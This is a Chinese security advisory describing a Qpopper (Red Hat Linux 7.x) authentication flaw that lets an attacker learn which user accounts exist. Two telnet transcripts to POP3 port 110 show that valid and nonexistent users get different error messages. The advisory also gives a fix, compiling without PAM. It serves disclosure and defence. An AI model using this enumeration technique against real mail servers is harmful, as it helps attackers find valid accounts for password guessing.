您当前的位置 >> 首页     

Qpopper 验证方式漏洞

/ns/ld/unix/data/20010909024840.htm

涉及程序:
Qpopper

描述:
利用 Qpopper 验证方式漏洞取得用户信息

详细:
发现 Redhat Linux 7.x Qpopper 软件包验证方式上存在漏洞,攻击者利用此漏洞能取得受影响服务器的用户信息


以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负


[root@bart /etc]# telnet 10.10.10.1 110
Trying 10.10.10.1...
Connected to 10.10.10.1.
Escape character is '^]'.
+OK ready <22975.998689264@target.host>
user validuser
+OK Password required for validuser.
pass valid
-ERR [AUTH] PAM authentication failed for user "validuser": Authentication
failure (7)
+OK Pop server at target.host signing off.
Connection closed by foreign host.

Non-existent account:


[root@bart /etc]# telnet 10.10.10.1 110
Trying 10.10.10.1...
Connected to 10.10.10.1.
Escape character is '^]'.
+OK ready <22984.998689464@target.host>
user fakeuser
+OK Password required for fakeuser.
pass fakeeeee
-ERR [AUTH] Password supplied for "fakeuser" is incorrect.
+OK Pop server at target.host signing off.
Connection closed by foreign host.


解决方案:
编译 qpopper 时不使用 PAM 支持

关于我们 | 加入我们 | 网站结构 | 交换连接 | 联系我们

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Network Security Group.
All Rights Reserved.
W3C XHTML 1.0 Strict & CSS 1.2 Valid.